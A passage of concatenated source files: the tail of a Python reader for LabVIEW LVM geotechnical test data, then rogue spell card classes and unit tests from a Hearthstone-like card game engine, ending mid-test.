columnName[i] = re.split(r'\t+', columnName[i].rstrip('\n'))
for i in range(len(data)):
data[i] = re.split(r'\t+', data[i].rstrip('\n'))
# Store time and mode in new lists
for i in range(len(data)):
time.append(data[i].pop(0)) # Timestamp
mode.append(data[i].pop(-1)) # Mode
# Convert timestamp to seconds
d = []
prevTime = time[0]  # initialize so the first iteration compares against itself (avoids NameError)
for i in range(len(time)):
h, m, s = time[i].split(':')
if int(h) == 0 and int(prevTime.split(':')[0]) == 23:
d.append(i)
prevTime = time[i]
time[i] = len(d)*24*3600 + int(h)*3600 + int(m)*60 + int(float(s))
time = np.array(time)
time = time - time[0] # Set initial time to zero
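# e.g. (illustrative) timestamps ["23:59:50", "00:00:10"] become [0, 20]:
# the hour wrap from 23 to 0 adds one day (86400 s) before re-zeroing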
# Convert list to 2D numpy float array
fileID = np.array(fileID)
header = np.array(header)
columnName = np.array(columnName)
calibData = np.array(calibData)
data = np.array(data)
data = data.astype(float)  # np.float was removed in NumPy 1.24; use the builtin
# Search for changes in modes
change = mode[0] # Initial value
modeChange = [change]
for val, id in enumerate(mode):
if change != mode[val]:
change = id
modeChange.append(id+' '+str(val))
# Return one array for consistency
bundleAllInfo = [fileID, header, calibData, columnName, time, modeChange, data]
return bundleAllInfo
# TODO: Must fix LVM reader for coldroom triaxial
## Adapted to fit with weird triaxial data in cooling room
else:
header = lines[numbering[0]+1:numbering[1]]
calibData = lines[numbering[1]+1:numbering[2]]
columnName = lines[numbering[2]+1:numbering[3]]
dat_1 = lines[numbering[3]+1:numbering[4]-3]
dat_2 = lines[numbering[4]+1:]
data = dat_1 + dat_2
del dat_1, dat_2
# Convert comma to dot in data
for val, id in enumerate(data):
data[val] = id.replace(",", ".")
for val, id in enumerate(calibData):
calibData[val] = id.replace(",", ".")
# Split string data into lists
fileID = re.split(r'\t+', fileID.rstrip('\n'))
for i in range(len(header)):
header[i] = re.split(r'\t+', header[i].rstrip('\n'))
if 'Depth' in header[i]:
# Convert comma to dot in depth
header[i][1] = header[i][1].replace(",", ".")
for i in range(len(calibData)):
calibData[i] = re.split(r'\t+', calibData[i].rstrip('\n'))
for i in range(len(columnName)):
columnName[i] = re.split(r'\t+', columnName[i].rstrip('\n'))
for i in range(len(data)):
data[i] = re.split(r'\t+', data[i].rstrip('\n'))
# Make array rectangular
if len(data[-1])>len(data[3]):
extraInfoInData = data[-1].pop(-1) # Label in LVM
# Store time and mode in new lists
for i in range(len(data)):
time.append(data[i].pop(0)) # Timestamp
mode.append(data[i].pop(-1)) # Mode
#
# if len(data[0])<len(data[3]): # Add empty entries
# data[0].append(0)
#
for i in range(len(data)):
if len(data[i])<len(data[5]): # Add empty entries
data[i].append(0)
# Convert timestamp to seconds
d = []
prevTime = time[0]  # same guard as above: avoid NameError on the first sample
for i in range(len(time)):
h, m, s = time[i].split(':')
if int(h) == 0 and int(prevTime.split(':')[0]) == 23:
d.append(i)
prevTime = time[i]
time[i] = len(d)*24*3600 + int(h)*3600 + int(m)*60 + int(float(s))
time = np.array(time)
time = time - time[0] # Set initial time to zero
# Convert list to 2D numpy float array
fileID = np.array(fileID)
header = np.array(header)
columnName = np.array(columnName)
calibData = np.array(calibData)
data = np.array(data)
data = data.astype(float)  # np.float was removed in NumPy 1.24; use the builtin
# Search for changes in modes
change = mode[0] # Initial value
modeChange = [change]
for val, id in enumerate(mode):
if change != mode[val]:
change = id
modeChange.append(id+' '+str(val))
# Return one array for consistency
bundleAllInfo = [fileID, header, calibData, columnName, time, modeChange, data]
return bundleAllInfo
if __name__ == "__main__":
import sys
from PyQt4 import QtGui
import numpy as np
# # For testing
filey = ".\\Raw files\\oedometer.lvm"
# filey = '.\\Raw files\\Cold Room\\Test4_Unknown.lvm'
# filey = '.\\Raw files\\Treax - 2015\\G5-1_CIUc_D9-30m.lvm'
fileID, header, calibData, columnName, time, modeChange, data = readLVM(filey)
``` |
{
"source": "jomyhuang/sdwle",
"score": 2
} |
#### File: cards_copy/spells/rogue.py
```python
import copy
from SDWLE.cards.base import SpellCard
from SDWLE.tags.action import AddCard
from SDWLE.tags.base import Effect, BuffUntil, Buff, AuraUntil, ActionTag
from SDWLE.tags.condition import IsSpell
from SDWLE.tags.event import TurnStarted, TurnEnded, SpellCast
from SDWLE.tags.selector import PlayerSelector, CardSelector
from SDWLE.tags.status import Stealth, ChangeAttack, ManaChange
import SDWLE.targeting
from SDWLE.constants import CHARACTER_CLASS, CARD_RARITY
class Assassinate(SpellCard):
def __init__(self):
super().__init__("Assassinate", 5, CHARACTER_CLASS.ROGUE, CARD_RARITY.FREE,
target_func=SDWLE.targeting.find_enemy_minion_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.die(self)
class Backstab(SpellCard):
def __init__(self):
super().__init__("Backstab", 0, CHARACTER_CLASS.ROGUE, CARD_RARITY.FREE,
target_func=SDWLE.targeting.find_minion_spell_target,
filter_func=lambda target: target.health == target.calculate_max_health() and
target.spell_targetable())
def use(self, player, game):
super().use(player, game)
self.target.damage(player.effective_spell_damage(2), self)
class Betrayal(SpellCard):
def __init__(self):
super().__init__("Betrayal", 2, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON,
target_func=SDWLE.targeting.find_enemy_minion_spell_target)
def use(self, player, game):
super().use(player, game)
left_minion = None
right_minion = None
index = self.target.index
if index > 0:
left_minion = game.other_player.minions[index - 1]
if index < min(len(game.other_player.minions) - 1, 6):
right_minion = game.other_player.minions[index + 1]
original_immune = self.target.immune
self.target.immune = True
if left_minion is not None:
left_minion.damage(self.target.calculate_attack(), self.target)
if right_minion is not None:
right_minion.damage(self.target.calculate_attack(), self.target)
self.target.immune = original_immune
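# Note (reading of the code above): the target is made temporarily immune while
# its neighbours take the damage, so effects triggered by those hits cannot
# damage the dealing minion mid-resolution.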
class BladeFlurry(SpellCard):
def __init__(self):
super().__init__("Blade Flurry", 2, CHARACTER_CLASS.ROGUE, CARD_RARITY.RARE)
def use(self, player, game):
super().use(player, game)
if player.weapon is not None:
# Yes, this card is affected by spell damage cards.
# Source: http://www.hearthhead.com/card=1064/blade-flurry#comments:id=1927317
attack_power = player.effective_spell_damage(player.hero.calculate_attack())
player.weapon.destroy()
for minion in copy.copy(game.other_player.minions):
minion.damage(attack_power, self)
game.other_player.hero.damage(attack_power, self)
class ColdBlood(SpellCard):
def __init__(self):
super().__init__("Cold Blood", 1, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON,
target_func=SDWLE.targeting.find_minion_spell_target)
def use(self, player, game):
super().use(player, game)
if player.cards_played > 0:
self.target.change_attack(4)
else:
self.target.change_attack(2)
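# Note: `player.cards_played > 0` is how this engine models Hearthstone's
# "Combo" mechanic -- the bonus branch applies only when another card was
# already played this turn (see also Eviscerate and Headcrack below).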
class Conceal(SpellCard):
def __init__(self):
super().__init__("Conceal", 1, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
for minion in player.minions:
if not minion.stealth:
minion.add_buff(BuffUntil(Stealth(), TurnStarted()))
class DeadlyPoison(SpellCard):
def __init__(self):
super().__init__("Deadly Poison", 1, CHARACTER_CLASS.ROGUE, CARD_RARITY.FREE)
def use(self, player, game):
super().use(player, game)
player.weapon.base_attack += 2
player.hero.change_temp_attack(2)
def can_use(self, player, game):
return super().can_use(player, game) and player.weapon is not None
class Eviscerate(SpellCard):
def __init__(self):
super().__init__("Eviscerate", 2, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON,
target_func=SDWLE.targeting.find_spell_target)
def use(self, player, game):
super().use(player, game)
if player.cards_played > 0:
self.target.damage(player.effective_spell_damage(4), self)
else:
self.target.damage(player.effective_spell_damage(2), self)
class FanOfKnives(SpellCard):
def __init__(self):
super().__init__("Fan of Knives", 3, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
for minion in copy.copy(game.other_player.minions):
minion.damage(player.effective_spell_damage(1), self)
player.draw()
class Headcrack(SpellCard):
def __init__(self):
super().__init__("Headcrack", 3, CHARACTER_CLASS.ROGUE, CARD_RARITY.RARE)
def use(self, player, game):
super().use(player, game)
game.other_player.hero.damage(player.effective_spell_damage(2), self)
if player.cards_played > 0:
player.add_effect(Effect(TurnEnded(), ActionTag(AddCard(self), PlayerSelector())))
class Preparation(SpellCard):
def __init__(self):
super().__init__("Preparation", 0, CHARACTER_CLASS.ROGUE, CARD_RARITY.EPIC)
def use(self, player, game):
super().use(player, game)
player.add_aura(AuraUntil(ManaChange(-3), CardSelector(condition=IsSpell()), SpellCast()))
class Sap(SpellCard):
def __init__(self):
super().__init__("Sap", 2, CHARACTER_CLASS.ROGUE, CARD_RARITY.FREE,
target_func=SDWLE.targeting.find_enemy_minion_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.bounce()
class Shadowstep(SpellCard):
def __init__(self):
super().__init__("Shadowstep", 0, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON,
target_func=SDWLE.targeting.find_friendly_minion_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.bounce()
self.target.card.add_buff(Buff(ManaChange(-3)))
class Shiv(SpellCard):
def __init__(self):
super().__init__("Shiv", 2, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON,
target_func=SDWLE.targeting.find_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.damage(player.effective_spell_damage(1), self)
player.draw()
class SinisterStrike(SpellCard):
def __init__(self):
super().__init__("Sinister Strike", 1, CHARACTER_CLASS.ROGUE, CARD_RARITY.FREE)
def use(self, player, game):
super().use(player, game)
game.other_player.hero.damage(player.effective_spell_damage(3), self)
class Sprint(SpellCard):
def __init__(self):
super().__init__("Sprint", 7, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
for i in range(0, 4):
player.draw()
class Vanish(SpellCard):
def __init__(self):
super().__init__("Vanish", 6, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
targets = copy.copy(game.other_player.minions)
targets.extend(player.minions)
# Minions are returned to a player's hand in the order in which they were played.
# Source: http://www.hearthhead.com/card=196/vanish#comments:id=1908549
for minion in sorted(targets, key=lambda m: m.born):
minion.bounce()
class TinkersSharpswordOil(SpellCard):
def __init__(self):
super().__init__("Tinker's Sharpsword Oil", 4, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
player.weapon.base_attack += 3
player.hero.change_temp_attack(3)
if player.cards_played > 0:
targets = SDWLE.targeting.find_friendly_minion_battlecry_target(player.game, lambda x: x)
if targets is not None:
target = player.game.random_choice(targets)
target.add_buff(Buff(ChangeAttack(3)))
def can_use(self, player, game):
return super().can_use(player, game) and player.weapon is not None
class Sabotage(SpellCard):
def __init__(self):
super().__init__("Sabotage", 4, CHARACTER_CLASS.ROGUE, CARD_RARITY.EPIC)
def use(self, player, game):
super().use(player, game)
targets = SDWLE.targeting.find_enemy_minion_battlecry_target(player.game, lambda x: True)
target = game.random_choice(targets)
target.die(None)
game.check_delayed()
if player.cards_played > 0 and game.other_player.weapon is not None:
game.other_player.weapon.destroy()
def can_use(self, player, game):
return super().can_use(player, game) and len(game.other_player.minions) >= 1
class GangUp(SpellCard):
def __init__(self):
super().__init__("Gang Up", 2, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON,
target_func=SDWLE.targeting.find_minion_spell_target)
def use(self, player, game):
super().use(player, game)
for i in range(3):
player.put_back(type(self.target.card)())
```
#### File: testsSDW__copy/agents/trade_agent_tests.py
```python
import unittest
from SDWLE.agents.trade.possible_play import PossiblePlays
from SDWLE.cards import Wisp, WarGolem, BloodfenRaptor, RiverCrocolisk, AbusiveSergeant, ArgentSquire
from testsSDW.agents.trade.test_helpers import TestHelpers
from testsSDW.agents.trade.test_case_mixin import TestCaseMixin
class TestTradeAgent(TestCaseMixin, unittest.TestCase):
def test_setup_smoke(self):
game = TestHelpers().make_game()
self.add_minions(game, 0, Wisp(), WarGolem())
self.add_minions(game, 1, BloodfenRaptor())
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(1, len(game.players[1].minions))
def test_basic_trade(self):
game = TestHelpers().make_game()
self.add_minions(game, 1, Wisp(), WarGolem())
self.add_minions(game, 0, BloodfenRaptor())
self.make_all_active(game)
game.play_single_turn()
self.assert_minions(game.players[1], "War Golem")
self.assert_minions(game.players[0], "Bloodfen Raptor")
def test_buff_target(self):
game = TestHelpers().make_game()
self.add_minions(game, 0, BloodfenRaptor(), RiverCrocolisk())
self.make_all_active(game)
game.players[0].agent.player = game.players[0]
self.add_minions(game, 0, AbusiveSergeant())
game.play_single_turn()
def test_hero_power(self):
game = self.make_game()
cards = self.make_cards(game.current_player, ArgentSquire())
possible_plays = PossiblePlays(cards, 10, allow_hero_power=True)
self.assertEqual(1, len(possible_plays.plays()))
```
#### File: testsSDW__copy/card_tests/hunter_tests.py
```python
import random
import unittest
from SDWLE.agents.basic_agents import DoNothingAgent, PredictableAgent
from SDWLE.constants import MINION_TYPE
from testsSDW.agents.testing_agents import CardTestingAgent, OneCardPlayingAgent, WeaponTestingAgent, \
PlayAndAttackAgent, SelfSpellTestingAgent
from testsSDW.testing_utils import generate_game_for, mock
from SDWLE.cards import *
class TestHunter(unittest.TestCase):
def setUp(self):
random.seed(1857)
def test_HuntersMark(self):
game = generate_game_for(HuntersMark, MogushanWarden, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(7, game.current_player.minions[0].health)
self.assertEqual(7, game.current_player.minions[0].calculate_max_health())
# This will play all the hunter's marks currently in the player's hand
game.play_single_turn()
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual(1, game.other_player.minions[0].calculate_max_health())
def test_TimberWolf(self):
game = generate_game_for([StonetuskBoar, FaerieDragon, KoboldGeomancer, TimberWolf],
StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(2, game.current_player.minions[3].calculate_attack())
self.assertEqual(3, game.current_player.minions[2].calculate_attack())
self.assertEqual(2, game.current_player.minions[1].calculate_attack())
self.assertEqual(1, game.current_player.minions[0].calculate_attack())
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(6, len(game.current_player.minions))
self.assertEqual(2, game.current_player.minions[5].calculate_attack())
self.assertEqual(3, game.current_player.minions[4].calculate_attack())
self.assertEqual(2, game.current_player.minions[3].calculate_attack())
self.assertEqual(1, game.current_player.minions[2].calculate_attack())
self.assertEqual(2, game.current_player.minions[1].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
game.current_player.minions[1].die(None)
game.current_player.minions[1].activate_delayed()
self.assertEqual(5, len(game.current_player.minions))
self.assertEqual(2, game.current_player.minions[4].calculate_attack())
self.assertEqual(3, game.current_player.minions[3].calculate_attack())
self.assertEqual(2, game.current_player.minions[2].calculate_attack())
self.assertEqual(1, game.current_player.minions[1].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
game.current_player.minions[3].die(None)
game.current_player.minions[3].activate_delayed()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(2, game.current_player.minions[3].calculate_attack())
self.assertEqual(2, game.current_player.minions[2].calculate_attack())
self.assertEqual(1, game.current_player.minions[1].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
wolf = game.current_player.minions[1]
wolf.die(None)
wolf.activate_delayed()
self.assertEqual(3, len(game.current_player.minions))
self.assertEqual(1, game.current_player.minions[2].calculate_attack())
self.assertEqual(2, game.current_player.minions[1].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
def test_ArcaneShot(self):
game = generate_game_for(ArcaneShot, StonetuskBoar, CardTestingAgent, DoNothingAgent)
game.players[0].spell_damage = 1
game.play_single_turn()
self.assertEqual(27, game.other_player.hero.health)
def test_BestialWrath(self):
def verify_bwrath():
self.assertEqual(5, game.players[0].minions[0].calculate_attack())
self.assertTrue(game.players[0].minions[0].immune)
def verify_silence():
self.assertFalse(game.players[0].minions[0].immune)
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
game = generate_game_for([StonetuskBoar, BestialWrath, BestialWrath, BestialWrath, Silence, Archmage], Wisp,
CardTestingAgent, DoNothingAgent)
game.play_single_turn()
game.play_single_turn()
game.players[0].bind_once("turn_ended", verify_bwrath)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertFalse(game.players[0].minions[0].immune)
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
game.play_single_turn()
game.players[0].bind_once("turn_ended", verify_silence)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertFalse(game.players[0].minions[0].immune)
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
self.assertEqual(1, len(game.players[0].hand))
def test_Flare(self):
game = generate_game_for(Vaporize, [WorgenInfiltrator, WorgenInfiltrator],
CardTestingAgent, CardTestingAgent)
for turn in range(0, 5):
game.play_single_turn()
# Vaporize is in place and two Infiltrators are down
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(3, len(game.other_player.minions))
self.assertTrue(game.other_player.minions[0].stealth)
self.assertTrue(game.other_player.minions[1].stealth)
self.assertEqual(4, len(game.other_player.hand))
old_play = game.other_player.agent.do_turn
def _play_and_attack(player):
flare = Flare()
flare.target = None
flare.use(player, player.game)
old_play(player)
player.minions[4].attack()
game.other_player.agent.do_turn = _play_and_attack
game.play_single_turn()
# All of the Worgens should still be alive, because Vaporize is gone.
self.assertEqual(0, len(game.other_player.secrets))
self.assertEqual(7, len(game.current_player.minions))
for minion in game.current_player.minions[4:]:
self.assertFalse(minion.stealth)
def test_EaglehornBow(self):
game = generate_game_for([Snipe, EaglehornBow], StonetuskBoar, PlayAndAttackAgent,
OneCardPlayingAgent)
for turn in range(0, 9):
game.play_single_turn()
self.assertEqual(1, game.players[0].weapon.durability)
self.assertEqual(3, game.players[0].weapon.base_attack)
# Snipe should trigger, granting our weapon +1 durability
game.play_single_turn()
self.assertEqual(2, game.players[0].weapon.durability)
self.assertEqual(3, game.players[0].weapon.base_attack)
def test_GladiatorsLongbow(self):
game = generate_game_for(GladiatorsLongbow, WaterElemental, WeaponTestingAgent,
OneCardPlayingAgent)
for turn in range(0, 13):
game.play_single_turn()
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual(30, game.current_player.hero.health)
self.assertFalse(game.current_player.hero.frozen)
self.assertFalse(game.current_player.hero.immune)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(4, len(game.other_player.minions))
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual(1, game.other_player.minions[1].health)
self.assertEqual(30, game.current_player.hero.health)
self.assertFalse(game.current_player.hero.frozen)
self.assertFalse(game.current_player.hero.immune)
self.assertEqual(0, len(game.current_player.events))
def test_Tracking(self):
game = generate_game_for([Tracking, Tracking, Tracking, Tracking,
StonetuskBoar, BloodfenRaptor, KoboldGeomancer],
StonetuskBoar, CardTestingAgent, DoNothingAgent)
game.players[0].agent.choose_option = lambda options, player: options[0]
game.play_single_turn()
self.assertEqual(4, len(game.current_player.hand))
self.assertEqual("Stonetusk Boar", game.current_player.hand[3].name)
self.assertEqual(23, game.current_player.deck.left)
def test_ExplosiveTrap(self):
game = generate_game_for(ExplosiveTrap, StonetuskBoar, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(1, len(game.other_player.minions))
game.play_single_turn()
self.assertEqual(0, len(game.other_player.secrets))
self.assertEqual(0, len(game.current_player.minions))
self.assertEqual(28, game.current_player.hero.health)
self.assertEqual(29, game.other_player.hero.health)
random.seed(1857)
game = generate_game_for(ExplosiveTrap, Frostbolt, CardTestingAgent, CardTestingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(1, len(game.other_player.secrets))
self.assertEqual(30, game.current_player.hero.health)
self.assertEqual(27, game.other_player.hero.health)
def test_FreezingTrap(self):
game = generate_game_for(FreezingTrap, BluegillWarrior, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(4, len(game.players[0].hand))
self.assertEqual(7, len(game.players[1].hand))
self.assertEqual(4, game.players[1].hand[6].mana_cost())
self.assertEqual(0, len(game.players[0].secrets))
self.assertEqual(30, game.players[0].hero.health)
game.play_single_turn()
self.assertEqual(4, len(game.players[0].hand))
game.play_single_turn()
self.assertEqual(0, len(game.current_player.minions))
self.assertEqual(30, game.players[0].hero.health)
self.assertEqual(8, len(game.players[1].hand))
self.assertEqual(4, game.players[1].hand[5].mana_cost())
self.assertEqual(4, game.players[1].hand[7].mana_cost())
def test_FreezingTrap_many_cards(self):
class FreezingTrapAgent(DoNothingAgent):
def do_turn(self, player):
if player.mana == 6:
game.play_card(player.hand[0])
if player.mana == 7:
player.minions[0].attack()
game = generate_game_for(FreezingTrap, BoulderfistOgre, CardTestingAgent, FreezingTrapAgent)
for turn in range(0, 12):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
death_mock = mock.Mock()
game.players[1].minions[0].bind_once("died", death_mock)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(10, len(game.current_player.hand))
self.assertEqual(0, len(game.current_player.minions))
for card in game.current_player.hand:
if card.name != "The Coin":
self.assertEqual(6, card.mana_cost())
self.assertEqual(30, game.other_player.hero.health)
death_mock.assert_called_once_with(None)
def test_Misdirection(self):
game = generate_game_for(Misdirection, StonetuskBoar, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(28, game.other_player.hero.health)
self.assertEqual(1, len(game.current_player.minions)) # The boar has been misdirected into another boar
self.assertEqual(30, game.current_player.hero.health)
def test_MisdirectionToHero(self):
game = generate_game_for(Misdirection, BluegillWarrior, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(30, game.other_player.hero.health) # The murloc should be misdirected
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(28, game.current_player.hero.health)
def test_FreezingTrapAndMisdirection(self):
game = generate_game_for([Misdirection, FreezingTrap], Wolfrider,
CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 6):
game.play_single_turn()
# Misdirection was played first so it triggers first, redirecting the attack to the enemy hero, but
# Freezing Trap triggers, bouncing the charging Wolfrider
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(8, len(game.players[1].hand))
self.assertEqual(5, game.players[1].hand[7].mana_cost())
self.assertEqual(4, len(game.players[0].hand))
self.assertEqual(30, game.other_player.hero.health)
self.assertEqual(30, game.current_player.hero.health)
self.assertEqual(0, len(game.players[0].secrets))
game.play_single_turn() # Should be able to play both Misdirection and Freezing Trap again
self.assertEqual(3, len(game.players[0].hand))
def test_Snipe(self):
game = generate_game_for([MagmaRager, OasisSnapjaw, FeralSpirit], Snipe, CardTestingAgent, CardTestingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(0, len(game.current_player.minions))
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(3, game.current_player.minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.current_player.minions))
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[1].health)
self.assertEqual(3, game.current_player.minions[2].health)
def test_ExplosiveTrap_hero(self):
game = generate_game_for(ExplosiveTrap, Naturalize, OneCardPlayingAgent, PredictableAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(30, game.current_player.hero.health)
self.assertEqual(30, game.other_player.hero.health)
game.play_single_turn()
self.assertEqual(0, len(game.other_player.secrets))
self.assertEqual(29, game.current_player.hero.health)
self.assertEqual(29, game.other_player.hero.health)
def test_SavannahHighmane(self):
game = generate_game_for(SavannahHighmane, SiphonSoul, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 12):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual("Hyena", game.players[0].minions[0].card.name)
self.assertEqual("Hyena", game.players[0].minions[1].card.name)
def test_Houndmaster(self):
game = generate_game_for([Houndmaster, StonetuskBoar], IronfurGrizzly, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
self.assertEqual(3, game.players[1].minions[0].calculate_attack())
self.assertEqual(3, game.players[1].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
self.assertEqual(3, game.players[0].minions[1].health)
self.assertTrue(game.players[0].minions[1].taunt)
self.assertEqual("<NAME>", game.players[0].minions[1].card.name)
self.assertEqual(4, game.players[0].minions[2].calculate_attack())
self.assertEqual(3, game.players[0].minions[2].health)
def test_DeadlyShot(self):
game = generate_game_for(DeadlyShot, SenjinShieldmasta, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(7, len(game.players[0].hand))
self.assertEqual(1, len(game.players[1].minions))
# Can't use until a unit is on the field
game.play_single_turn()
self.assertEqual(7, len(game.players[0].hand))
self.assertEqual(0, len(game.players[1].minions))
def test_MultiShot(self):
game = generate_game_for(MultiShot, SenjinShieldmasta, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 10):
game.play_single_turn()
self.assertEqual(8, len(game.players[0].hand))
self.assertEqual(2, len(game.players[1].minions))
self.assertEqual(5, game.players[1].minions[0].health)
self.assertEqual(5, game.players[1].minions[1].health)
# Can't use until 2 units are on the field
game.play_single_turn()
self.assertEqual(8, len(game.players[0].hand))
self.assertEqual(2, len(game.players[1].minions))
self.assertEqual(2, game.players[1].minions[0].health)
self.assertEqual(2, game.players[1].minions[1].health)
def test_ExplosiveShot(self):
game = generate_game_for(IronfurGrizzly, ExplosiveShot, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 9):
game.play_single_turn()
game.players[1].agent.choose_target = lambda targets: targets[len(targets) - 2]
self.assertEqual(3, len(game.players[0].minions))
game.play_single_turn()
# Explosive Shot the middle Grizzly
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].health)
self.assertEqual(1, game.players[0].minions[1].health)
def test_KillCommand(self):
game = generate_game_for([KillCommand, StonetuskBoar], StonetuskBoar,
SelfSpellTestingAgent, OneCardPlayingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(27, game.players[0].hero.health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(22, game.players[0].hero.health)
def test_UnleashTheHounds(self):
game = generate_game_for(UnleashTheHounds, StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(2, len(game.players[1].minions))
self.assertEqual("Hound", game.players[0].minions[0].card.name)
self.assertEqual("Hound", game.players[0].minions[1].card.name)
def test_StarvingBuzzard(self):
game = generate_game_for(StarvingBuzzard, StonetuskBoar, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 9):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(4, len(game.players[1].minions))
self.assertEqual(7, len(game.players[0].hand))
self.assertEqual(5, len(game.players[1].hand))
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(5, len(game.players[1].minions))
self.assertEqual(7, len(game.players[0].hand))
self.assertEqual(4, len(game.players[1].hand))
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(5, len(game.players[1].minions))
self.assertEqual(8, len(game.players[0].hand))
self.assertEqual(4, len(game.players[1].hand))
def test_BuzzardAndOwl(self):
game = generate_game_for([StarvingBuzzard, IronbeakOwl], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 11):
game.play_single_turn()
# The buzzard should be silenced, but only after drawing a card from the owl
self.assertEqual(8, len(game.current_player.hand))
self.assertEqual(0, len(game.current_player.minions[1].effects))
def test_TundraRhino(self):
game = generate_game_for([StonetuskBoar, OasisSnapjaw, TundraRhino], StonetuskBoar,
PlayAndAttackAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(27, game.players[1].hero.health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(26, game.players[1].hero.health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(21, game.players[1].hero.health)
self.assertTrue(game.players[0].minions[0].charge())
self.assertTrue(game.players[0].minions[1].charge())
self.assertTrue(game.players[0].minions[2].charge())
game.players[0].minions[2].silence()
self.assertTrue(game.players[0].minions[2].charge())
def test_TundraRhino_with_silence(self):
game = generate_game_for([StonetuskBoar, OasisSnapjaw, TundraRhino, Silence], StonetuskBoar,
PlayAndAttackAgent, DoNothingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(26, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
